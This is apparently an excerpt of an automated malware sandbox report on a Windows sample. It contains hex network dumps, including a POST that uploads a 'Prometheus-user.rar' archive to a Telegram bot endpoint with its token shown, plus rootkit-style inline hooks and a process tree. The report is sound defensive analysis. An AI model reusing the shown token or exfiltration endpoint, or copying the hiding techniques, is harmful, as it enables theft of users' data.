                                                                                                  2024-08-01 22:08:04 UTC16384OUTData Raw: cc 07 76 c7 74 9d 2d 25 3d 8f 08 6b a9 31 c1 5e a0 0a 98 a5 cf 66 1c ee 95 47 e1 6e 8b 1c 7e e8 f6 07 09 69 d6 20 78 55 ee 1c b5 0a 6d 1b ee 14 19 90 5c 88 5b e8 8c 92 aa e8 a5 5f 86 f7 c6 39 2f 27 8f b5 fa 79 d8 df 95 a8 f5 ba 1a be 52 b6 c8 ff 38 2f 55 70 d6 ba cf 8b c1 19 6d 2f 86 1e bd 25 52 51 4a 39 34 c4 66 f9 25 72 22 a0 91 ae 75 1d 63 5f 1c ff a1 0f 43 67 1d af 4b 55 10 41 7d c2 09 0f 00 cd 10 4b 61 70 92 fd ca 4d e3 35 f3 36 c7 60 39 6a 8b 71 7e b1 ad 80 6d d2 99 ff 19 30 73 13 f3 1a 22 5d d4 0f 8a 4c cf 86 56 b8 24 29 8d 47 08 36 8a 7f 45 89 38 11 ac 20 3d bb 6c 59 f5 b7 f2 e9 b2 96 e9 0b 4a cf a1 c9 f2 aa 38 64 91 15 05 f7 c8 bc 43 55 b2 c7 af 5e a6 fa ad ad 12 87 7d 92 dd 0c 8d 12 33 a2 c3 26 f7 27 9d f6 03 9c 3d 76 f5 97 31 db 9c 14 76 99 21
                                                                                                  Data Ascii: vt-%=k1^fGn~i xUm\[_9/'yR8/Upm/%RQJ94f%r"uc_CgKUA}KapM56`9jq~m0s"]LV$)G6E8 =lYJ8dCU^}3&'=v1v!
                                                                                                  2024-08-01 22:08:04 UTC16384OUTData Raw: 11 f2 1c cb d8 20 56 a9 01 4c 21 3d e2 26 c9 e0 b7 ef e2 09 c0 42 fe 59 9f 8d 5b 47 4b ad 1c 38 a4 05 c1 96 0e 1d 2b 2a e4 60 a6 ac 88 0c 88 91 ab 4d cf fe cf 7e 9a af 8e ab 07 15 b7 b0 06 70 64 1d fb 9e 1b e9 4f b4 b2 7e 6e 8c 15 cc be 09 c3 2a 97 31 30 53 12 79 8a 14 08 ee 64 d3 10 d2 8f d9 7d 19 07 bd f1 a8 f1 c3 7b 61 83 6f 4f 7e 27 9d a0 81 64 9f 61 66 48 09 6e 08 44 a2 94 a9 7f 35 9c 7d 3e 08 18 46 ce ac 47 71 11 48 e2 38 51 bc d8 3c af 1e 98 3e dd a9 f3 de be 51 02 f1 ff db 11 d3 01 3b b4 a8 15 aa ef b1 62 36 4a 69 59 5f 81 92 63 43 fa fb 89 28 35 c6 ca 10 31 fd 92 b2 53 46 96 2e 3e b3 f0 1f e6 b5 45 e4 80 c0 1d c2 31 ca 2c 60 3b 36 93 60 a7 65 31 56 60 7f a9 92 cf 7f b0 02 9e 1d 56 8f 17 34 52 5e d4 e4 a6 b4 40 ea 14 a1 d1 7f 7e 2f 4a 4c 17 c2 f6
                                                                                                  Data Ascii: VL!=&BY[GK8+*`M~pdO~n*10Syd}{aoO~'dafHnD5}>FGqH8Q<>Q;b6JiY_cC(51SF.>E1,`;6`e1V`V4R^@~/JL
                                                                                                  2024-08-01 22:08:04 UTC16384OUTData Raw: 38 78 b3 a1 2b bd bc f3 ca 6a f7 e1 e6 dd bf 66 da 6b ac bc 1c 5e 44 71 0d 87 80 a6 e5 c4 2c ed 4d 3e 3b 10 39 45 d1 42 86 fe e9 64 96 5d a9 17 fb 29 4c 07 33 a5 64 8b 9f 18 68 06 bc 40 51 d0 0c f7 e6 4b fd 7e 14 73 15 66 52 63 a2 a7 18 31 e5 27 34 e6 c9 db 22 53 b8 97 20 fa 77 d2 ad b8 89 9a fc 80 6b 76 91 c5 f9 a4 a5 f9 04 4e 81 54 1d 49 1f b7 e0 97 69 7d 77 2f ae 10 cf a7 03 db 0c 48 4a 4d cb e7 b5 70 59 3f 86 99 7f 62 8b ba 86 e8 77 b7 38 8d 23 07 fa 9b 46 d0 78 e5 48 a5 60 53 9a 7e 60 91 ee 9c 29 c0 95 96 d4 80 61 96 7d d0 80 86 0d 08 b4 ea f7 e9 63 e4 32 9a f5 ed d4 97 21 46 2e 73 25 5f e0 bf 32 e1 95 5b a3 4b 42 c5 4e 0b 41 a2 62 08 d9 78 0f 70 f3 04 1a 6f 7a dc ab ba 80 5b e4 56 2f 93 83 62 ea e9 12 b7 69 16 5e 21 34 8e 87 8c a8 c6 72 38 17 64 03
                                                                                                  Data Ascii: 8x+jfk^Dq,M>;9EBd])L3dh@QK~sfRc1'4"S wkvNTIi}w/HJMpY?bw8#FxH`S~`)a}c2!F.s%_2[KBNAbxpoz[V/bi^!4r8d
                                                                                                  2024-08-01 22:08:04 UTC1363INHTTP/1.1 404 Not Found
                                                                                                  Date: Thu, 01 Aug 2024 22:08:04 GMT
                                                                                                  Content-Type: application/json
                                                                                                  Content-Length: 45
                                                                                                  Connection: close
                                                                                                  set-cookie: __dcfduid=86a67c90505211efa91f02a2205ccffc; Expires=Tue, 31-Jul-2029 22:08:04 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                  strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                  x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                  x-ratelimit-limit: 5
                                                                                                  x-ratelimit-remaining: 4
                                                                                                  x-ratelimit-reset: 1722550086
                                                                                                  x-ratelimit-reset-after: 1
                                                                                                  via: 1.1 google
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2CBDsglSGZFtmEeHZSaZpu0gKvclv57NsKn2ouq5Wvr%2BKbHhBPUdkKEAjfq36xufpoUjuGflx4Jvyl4mSQSjQ0AG3EvGLr1mEG3nt1AYH%2BJeKO6517B2wOimkuVI"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                  Set-Cookie: __sdcfduid=86a67c90505211efa91f02a2205ccffc9478c4367cc9c36b457f84c079b54cecf5426fcf88478aa68b98437576e030a4; Expires=Tue, 31-Jul-2029 22:08:04 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                  Set-Cookie: __cfruid=b3a25f467d6e14d2f5864b2062409193ec70586a-1722550084; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  1192.168.2.449745149.154.167.2204436900C:\ProgramData\Microsoft\based.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-08-01 22:08:05 UTC268OUTPOST /bot7006262545:AAG_Oybxah5yJgAPFw9HTnZfJtepO5xBob8/sendDocument HTTP/1.1
                                                                                                  Host: api.telegram.org
                                                                                                  Accept-Encoding: identity
                                                                                                  Content-Length: 693625
                                                                                                  User-Agent: python-urllib3/2.2.2
                                                                                                  Content-Type: multipart/form-data; boundary=70a0ee6004635fcdc0eadbf20538b64a
                                                                                                  2024-08-01 22:08:05 UTC16384OUTData Raw: 2d 2d 37 30 61 30 65 65 36 30 30 34 36 33 35 66 63 64 63 30 65 61 64 62 66 32 30 35 33 38 62 36 34 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 72 6f 6d 65 74 68 65 75 73 2d 6a 6f 6e 65 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 39 19 9b 57 21 04 00 00 01 0f 3d 07 9e 02 22 8a 83 18 9c 6e 12 8d b8 4a ec cf 48 aa bc 68 db 08 0b bf 7b cf 99 8c f0 76 b3 e6 c0 83 a1 2e d1 8c a9 54 97 e9 73 a1 ad f3 6e f3 cd 21 bd 88 ab f9 2a ec 72 58 e7 19 d7 cd f7 92 3d 63 5a 0e 32 49 fa 4f cc ab 2a 83 54
                                                                                                  Data Ascii: --70a0ee6004635fcdc0eadbf20538b64aContent-Disposition: form-data; name="document"; filename="Prometheus-user.rar"Content-Type: application/octet-streamRar!9W!="nJHh{v.Tsn!*rX=cZ2IO*T
                                                                                                  2024-08-01 22:08:05 UTC16384OUTData Raw: f0 17 c0 9f 37 e3 2a 06 f8 83 d4 32 d4 01 38 97 78 04 ce d0 76 65 97 ea e6 0a aa 55 3c 51 3f e3 7e 57 eb 2c a0 d4 d2 07 86 cc 2e cd e3 c1 69 08 58 e8 ac 52 59 3a 00 5e 3d 89 9b 31 c4 0f e2 66 45 9e 98 a3 10 61 e0 20 9a 64 82 68 98 a7 79 bc e3 63 3b cd d5 22 b0 dc 9e 4d 96 09 46 35 3f 83 a9 ea e5 1f 77 ec 5c 80 0f 59 2a e6 e7 98 d4 05 90 45 49 76 a4 7f 1a 0e 79 0d bb 56 59 32 2c d2 ac 99 e0 41 8a b8 d8 f9 c2 8e 99 c5 4f ef 67 66 9a cb 11 48 42 7e 64 20 52 5d 9c 7a 77 f0 ab b0 67 e3 7c 4f f8 72 03 22 3b 48 b4 57 1e a8 c5 21 fa ae c5 18 47 ed 76 6d 16 4b 7a 36 f5 1c 2e e2 9d 84 7e a5 d8 b1 a2 0a d3 74 0f e4 02 be e0 8d 07 d0 65 b6 60 15 ab 84 b4 ec ef f0 e4 ea 05 3d 90 0d 24 38 fc c1 66 b6 b3 65 01 69 4d d6 a7 4a d6 84 5e 5e cc ae fc 0a d9 22 5d 73 3d 53 14
                                                                                                  Data Ascii: 7*28xveU<Q?~W,.iXRY:^=1fEa dhyc;"MF5?w\Y*EIvyVY2,AOgfHB~d R]zwg|Or";HW!GvmKz6.~te`=$8feiMJ^^"]s=S
                                                                                                  2024-08-01 22:08:05 UTC16384OUTData Raw: 02 21 eb c2 4b 43 0e 58 51 8b b1 de 55 4c df d0 32 d5 98 e3 55 9c 1a 97 3c 45 f8 f4 ae 65 05 82 a8 f3 5f b4 7a 89 21 10 fa 5f 14 4a 4d f4 0c 6c 53 c3 6b c3 91 ff c6 36 eb c0 c5 24 1e 70 7b f8 5f 09 82 fb f9 ee 34 2e 33 a3 58 53 85 8b 96 ac 19 61 ff c1 91 84 12 b6 59 5d 80 c5 de 3f cc 1c 19 b3 5a 1b 89 68 7c 5d 6a 70 4f ec 8d 5c 0e 12 76 a9 5a 3f 55 13 12 60 c2 c7 68 85 71 32 82 cd 2b 6d a9 ec a0 50 86 09 8a ac f3 db 1e 55 8e 1a fa 2a d2 c9 65 80 ef 6b a7 6b e8 4e 4e 9a 6c 47 bf 59 24 94 63 2f 0c 5a b3 87 56 4a 8a 31 96 d2 d2 27 a2 dd 32 8a f3 ec a8 3c 5d d3 40 d4 63 74 8b 88 18 ba 43 fe 99 db 3c 47 8b 0c 34 0c 37 12 04 b9 88 76 ec 17 03 06 ff f9 41 44 a3 88 43 90 e5 e4 c9 57 0c d6 7a 47 e2 28 08 ef 9f c9 41 bb b3 d6 1a 02 24 a8 5f 61 65 e1 00 0e 05 86 40
                                                                                                  Data Ascii: !KCXQUL2U<Ee_z!_JMlSk6$p{_4.3XSaY]?Zh|]jpO\vZ?U`hq2+mPU*ekkNNlGY$c/ZVJ1'2<]@ctC<G47vADCWzG(A$_ae@
                                                                                                  2024-08-01 22:08:05 UTC16384OUTData Raw: 5b 22 39 2c 46 e7 8f 8e 47 df 67 71 80 66 91 35 1f 85 09 e6 9c f6 5b 91 01 b6 f2 8d 9f 69 2e dd 99 d9 84 fd 1b 33 15 f8 19 51 f8 02 b6 56 41 f5 86 7a ea 09 58 9c f5 4c 81 0b 65 72 40 e3 0b 48 20 6c 5c 8c 05 cd d6 9c cd 77 60 8f 33 13 56 a1 65 f3 ae 4f 46 38 06 08 0d 1a ee d5 93 58 9e 3b b7 1d 8e f5 34 7b 3d 33 f6 35 42 29 f3 aa e3 74 7c b9 61 ad 4d 85 b1 36 29 d1 bd 22 01 3c de 5a 52 64 8d 9a cc 74 e8 c7 68 f3 50 68 e8 a0 72 03 1a 1c 0f 63 45 93 4b 01 15 ca 2e d2 1f 93 19 06 13 71 0e c8 a8 45 4b 44 99 68 c3 7c 32 7c 23 d3 f3 b3 6b 1e 06 ce e2 8b ed f8 41 c2 7d 09 e4 c8 f3 a3 45 de e4 54 e7 73 91 f5 40 ce 94 84 02 1e cb 41 ec 73 f6 7f 8e 12 24 23 94 f1 45 b1 73 60 84 d2 7f 08 c1 36 f8 af 68 4b 72 3a ea 15 5c b8 6e 6a cc e8 6f 8e f1 7a 29 27 1d b4 90 08 e1
                                                                                                  Data Ascii: ["9,FGgqf5[i.3QVAzXLer@H l\w`3VeOF8X;4{=35B)t|aM6)"<ZRdthPhrcEK.qEKDh|2|#kA}ETs@As$#Es`6hKr:\njoz)'
                                                                                                  2024-08-01 22:08:05 UTC16384OUTData Raw: a2 76 cf d3 53 c2 3d 41 9f 65 06 f3 59 ac ac 41 e8 a5 b6 77 23 06 74 be 11 59 82 83 a5 3d 54 a7 af f2 5f 24 58 aa 96 71 76 ee 4b c7 33 a3 e0 e6 3f ae fe f5 be 36 65 02 94 74 42 10 65 a8 d7 3b 3d f2 83 ac 8d a6 62 79 95 f6 b3 04 7a c1 4d e1 7f 27 f1 c6 2b 80 90 b1 b0 87 a3 ce 3a 7e 9e 99 a6 40 e1 71 ce be 4d 1c b4 9a 48 0f c0 97 ef e4 46 b8 2f e1 e0 de f7 0b ee fe bb 72 26 0d 13 03 b4 e9 4b d6 b4 3e d0 a8 58 92 77 ad 5d b4 ee 11 49 88 2e 08 18 c2 2d d3 24 bc 27 38 18 09 87 9d bc f2 94 c8 8e 8f f9 45 f5 91 b4 49 c2 2a d8 09 c1 77 44 7d 4c 43 a6 cf 47 69 cb b9 26 f6 71 ad 34 f4 f3 cb d3 af 45 d4 a3 8e 42 aa 38 c4 0a e9 85 11 d6 08 f5 1a ac 6e c1 aa f8 5e 4b 89 b9 a6 15 76 7e 7b 11 3a c7 8b a3 e4 d7 b1 93 c3 92 56 e3 71 f7 91 8e f8 c4 b2 99 d7 79 04 20 06 17
                                                                                                  Data Ascii: vS=AeYAw#tY=T_$XqvK3?6etBe;=byzM'+:~@qMHF/r&K>Xw]I.-$'8EI*wD}LCGi&q4EB8n^Kv~{:Vqy
                                                                                                  2024-08-01 22:08:05 UTC16384OUTData Raw: ae 0a a3 b7 cb 2f 13 b2 7f a1 b3 13 d5 52 93 fe 83 51 a5 a1 ba 58 67 02 73 80 24 fa 22 fb f0 66 af d3 c6 76 2a 72 04 bb 69 f5 a5 bb 56 16 94 56 6f 81 dd b1 1b d6 2c 3a 35 29 d8 64 f0 f0 84 fe 99 d4 b4 08 e5 fc e1 6c 06 ba 8e 8d 76 af d8 70 f1 27 5f a5 7d 47 b9 51 c4 8d b5 f6 4e c4 1f 58 45 d1 c1 60 50 1e cd 90 55 34 c7 2e da 23 4a 11 a6 e2 4c b4 9d 5c 15 90 38 03 73 b4 e2 42 4a d4 58 f5 57 db 9b f1 ce 8c ba aa be 0b 75 70 d6 f8 1f ba 8e 09 4f 7a da 05 0f a7 cb 33 43 68 96 39 6d 36 bc de 7c 53 be ce 93 5e d6 e0 76 05 b8 64 1c 25 6c 0a d5 8a 42 77 29 d5 ba c4 88 cf a1 4a d0 fa 8e 2c 65 41 77 7a ad 72 5f 1e 97 48 50 82 fa 76 8a c7 1d 5e 52 15 00 0e 06 27 e0 a7 46 82 1e 38 91 d3 9e f6 5a 51 2d 1b 15 b1 72 8d ff 2d ec 32 4f b9 48 60 43 74 80 98 fe 75 07 81 21
                                                                                                  Data Ascii: /RQXgs$"fv*riVVo,:5)dlvp'_}GQNXE`PU4.#JL\8sBJXWupOz3Ch9m6|S^vd%lBw)J,eAwzr_HPv^R'F8ZQ-r-2OH`Ctu!
                                                                                                  2024-08-01 22:08:05 UTC16384OUTData Raw: d8 0c 32 c7 06 21 86 2d b8 ca f1 ea ea d7 b5 71 9e da ff 37 ba 8d 3d be 66 7f ec 60 17 86 c1 55 bc 39 72 2f c3 76 ba b9 0a 92 31 b0 b0 db cf 56 2b 77 ff c5 45 47 36 bf dc 5f 65 5d 56 15 e6 6f 4a 83 14 62 03 5c 17 19 ac 9d dd b7 17 56 4c 9c 8b 8e 4e a1 98 3b a4 59 4a 1e b2 17 8c f4 03 81 d0 d5 42 62 7a 6d f7 79 f2 bf dc 70 74 43 20 e3 49 55 d9 44 46 3c a8 0d 7b 03 f3 12 22 af f7 3d bd dc 20 84 b4 0a 3f 62 2e 0a ce e4 ef 8b 98 89 6a 03 df f3 8f b3 b1 f5 23 1c 6b 80 74 37 9c 50 bc dd 38 93 cf c5 b0 69 d9 52 e4 83 0c 9d 6d 81 d0 93 23 51 53 6d ce e1 6d e9 83 7f 92 09 ec 8f ee 66 83 3f 34 38 e9 52 c8 84 47 73 ac 21 be 35 46 1e 84 50 d9 5e c0 8b ce 55 18 9a ad 20 12 46 dd 6e 68 fd ef a8 b8 0d 5d 27 76 de 58 20 18 4b eb 30 62 01 20 0b 06 2f 7e fa 93 d5 f0 9f 7d
                                                                                                  Data Ascii: 2!-q7=f`U9r/v1V+wEG6_e]VoJb\VLN;YJBbzmyptC IUDF<{"= ?b.j#kt7P8iRm#QSmmf?48RGs!5FP^U Fnh]'vX K0b /~}
                                                                                                  2024-08-01 22:08:05 UTC16384OUTData Raw: 50 e0 32 81 cc 07 76 c7 74 9d 2d 25 3d 8f 08 6b a9 31 c1 5e a0 0a 98 a5 cf 66 1c ee 95 47 e1 6e 8b 1c 7e e8 f6 07 09 69 d6 20 78 55 ee 1c b5 0a 6d 1b ee 14 19 90 5c 88 5b e8 8c 92 aa e8 a5 5f 86 f7 c6 39 2f 27 8f b5 fa 79 d8 df 95 a8 f5 ba 1a be 52 b6 c8 ff 38 2f 55 70 d6 ba cf 8b c1 19 6d 2f 86 1e bd 25 52 51 4a 39 34 c4 66 f9 25 72 22 a0 91 ae 75 1d 63 5f 1c ff a1 0f 43 67 1d af 4b 55 10 41 7d c2 09 0f 00 cd 10 4b 61 70 92 fd ca 4d e3 35 f3 36 c7 60 39 6a 8b 71 7e b1 ad 80 6d d2 99 ff 19 30 73 13 f3 1a 22 5d d4 0f 8a 4c cf 86 56 b8 24 29 8d 47 08 36 8a 7f 45 89 38 11 ac 20 3d bb 6c 59 f5 b7 f2 e9 b2 96 e9 0b 4a cf a1 c9 f2 aa 38 64 91 15 05 f7 c8 bc 43 55 b2 c7 af 5e a6 fa ad ad 12 87 7d 92 dd 0c 8d 12 33 a2 c3 26 f7 27 9d f6 03 9c 3d 76 f5 97 31 db 9c
                                                                                                  Data Ascii: P2vt-%=k1^fGn~i xUm\[_9/'yR8/Upm/%RQJ94f%r"uc_CgKUA}KapM56`9jq~m0s"]LV$)G6E8 =lYJ8dCU^}3&'=v1
                                                                                                  2024-08-01 22:08:05 UTC16384OUTData Raw: e6 76 d5 15 11 f2 1c cb d8 20 56 a9 01 4c 21 3d e2 26 c9 e0 b7 ef e2 09 c0 42 fe 59 9f 8d 5b 47 4b ad 1c 38 a4 05 c1 96 0e 1d 2b 2a e4 60 a6 ac 88 0c 88 91 ab 4d cf fe cf 7e 9a af 8e ab 07 15 b7 b0 06 70 64 1d fb 9e 1b e9 4f b4 b2 7e 6e 8c 15 cc be 09 c3 2a 97 31 30 53 12 79 8a 14 08 ee 64 d3 10 d2 8f d9 7d 19 07 bd f1 a8 f1 c3 7b 61 83 6f 4f 7e 27 9d a0 81 64 9f 61 66 48 09 6e 08 44 a2 94 a9 7f 35 9c 7d 3e 08 18 46 ce ac 47 71 11 48 e2 38 51 bc d8 3c af 1e 98 3e dd a9 f3 de be 51 02 f1 ff db 11 d3 01 3b b4 a8 15 aa ef b1 62 36 4a 69 59 5f 81 92 63 43 fa fb 89 28 35 c6 ca 10 31 fd 92 b2 53 46 96 2e 3e b3 f0 1f e6 b5 45 e4 80 c0 1d c2 31 ca 2c 60 3b 36 93 60 a7 65 31 56 60 7f a9 92 cf 7f b0 02 9e 1d 56 8f 17 34 52 5e d4 e4 a6 b4 40 ea 14 a1 d1 7f 7e 2f 4a
                                                                                                  Data Ascii: v VL!=&BY[GK8+*`M~pdO~n*10Syd}{aoO~'dafHnD5}>FGqH8Q<>Q;b6JiY_cC(51SF.>E1,`;6`e1V`V4R^@~/J
                                                                                                  2024-08-01 22:08:05 UTC16384OUTData Raw: 0a 07 69 17 38 78 b3 a1 2b bd bc f3 ca 6a f7 e1 e6 dd bf 66 da 6b ac bc 1c 5e 44 71 0d 87 80 a6 e5 c4 2c ed 4d 3e 3b 10 39 45 d1 42 86 fe e9 64 96 5d a9 17 fb 29 4c 07 33 a5 64 8b 9f 18 68 06 bc 40 51 d0 0c f7 e6 4b fd 7e 14 73 15 66 52 63 a2 a7 18 31 e5 27 34 e6 c9 db 22 53 b8 97 20 fa 77 d2 ad b8 89 9a fc 80 6b 76 91 c5 f9 a4 a5 f9 04 4e 81 54 1d 49 1f b7 e0 97 69 7d 77 2f ae 10 cf a7 03 db 0c 48 4a 4d cb e7 b5 70 59 3f 86 99 7f 62 8b ba 86 e8 77 b7 38 8d 23 07 fa 9b 46 d0 78 e5 48 a5 60 53 9a 7e 60 91 ee 9c 29 c0 95 96 d4 80 61 96 7d d0 80 86 0d 08 b4 ea f7 e9 63 e4 32 9a f5 ed d4 97 21 46 2e 73 25 5f e0 bf 32 e1 95 5b a3 4b 42 c5 4e 0b 41 a2 62 08 d9 78 0f 70 f3 04 1a 6f 7a dc ab ba 80 5b e4 56 2f 93 83 62 ea e9 12 b7 69 16 5e 21 34 8e 87 8c a8 c6 72
                                                                                                  Data Ascii: i8x+jfk^Dq,M>;9EBd])L3dh@QK~sfRc1'4"S wkvNTIi}w/HJMpY?bw8#FxH`S~`)a}c2!F.s%_2[KBNAbxpoz[V/bi^!4r
                                                                                                  2024-08-01 22:08:07 UTC389INHTTP/1.1 200 OK
                                                                                                  Server: nginx/1.18.0
                                                                                                  Date: Thu, 01 Aug 2024 22:08:06 GMT
                                                                                                  Content-Type: application/json
                                                                                                  Content-Length: 1701
                                                                                                  Connection: close
                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                                                  Code Manipulations

                                                                                                  Function NameHook TypeActive in Processes
                                                                                                  ZwEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                                                                  NtQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                                                                  ZwResumeThreadINLINEexplorer.exe, winlogon.exe
                                                                                                  NtDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                                                                  ZwDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                                                                                  NtEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                                                                                  NtQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                                                                                                  ZwEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                                                                  ZwQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                                                                                  NtResumeThreadINLINEexplorer.exe, winlogon.exe
                                                                                                  RtlGetNativeSystemInformationINLINEexplorer.exe, winlogon.exe
                                                                                                  NtQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                                                                  NtEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                                                                                  ZwQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                                                                                  ZwQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                                                                                                  Function NameHook TypeNew Data
                                                                                                  ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                  NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                  ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                  NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                  ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                  NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                  NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                                                  ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                  ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                  NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                  RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                  NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                  NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                  ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                  ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                                                  Function NameHook TypeNew Data
                                                                                                  ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                  NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                  ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                  NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                  ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                                                                  NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                                                                  NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                                                                  ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                  ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                  NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                                                                  RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                                                                  NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                  NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                                                                  ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                                                                  ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                                                                                  Click to jump to process

                                                                                                  Click to jump to process

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Click to jump to process

                                                                                                  Target ID:0
                                                                                                  Start time:18:07:02
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Users\user\Desktop\VaTlw2kNGc.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Users\user\Desktop\VaTlw2kNGc.exe"
                                                                                                  Imagebase:0x7ff7691a0000
                                                                                                  File size:22'154'667 bytes
                                                                                                  MD5 hash:21DD41D299117FE5C556AFC317F9FCBF
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:1
                                                                                                  Start time:18:07:03
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Users\user\Desktop\VaTlw2kNGc.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:"C:\Users\user\Desktop\VaTlw2kNGc.exe"
                                                                                                  Imagebase:0x7ff7691a0000
                                                                                                  File size:22'154'667 bytes
                                                                                                  MD5 hash:21DD41D299117FE5C556AFC317F9FCBF
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:2
                                                                                                  Start time:18:07:03
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe -pbeznogym
                                                                                                  Imagebase:0x7ff6eab90000
                                                                                                  File size:289'792 bytes
                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:3
                                                                                                  Start time:18:07:03
                                                                                                  Start date:01/08/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

